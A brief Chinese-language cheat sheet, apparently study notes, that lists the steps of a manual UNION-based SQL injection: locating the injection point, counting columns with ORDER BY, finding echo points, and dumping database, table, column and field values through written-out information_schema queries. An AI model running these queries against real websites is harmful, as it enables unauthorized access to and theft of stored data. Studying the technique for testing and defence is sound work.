1、判断是否SQL注入点
2、判断注入类型
3、判断字段数 order by
4、联合查询查看回显点 union select
5、爆数据库
database()
user()
6、爆表
select group_concat(table_name) from information_schema.tables where table_schema=database()
7、爆列名
select group_concat(column_name) from information_schema.columns where table_name=表名
8、爆数据库值
select group_concat(字段名) from 表名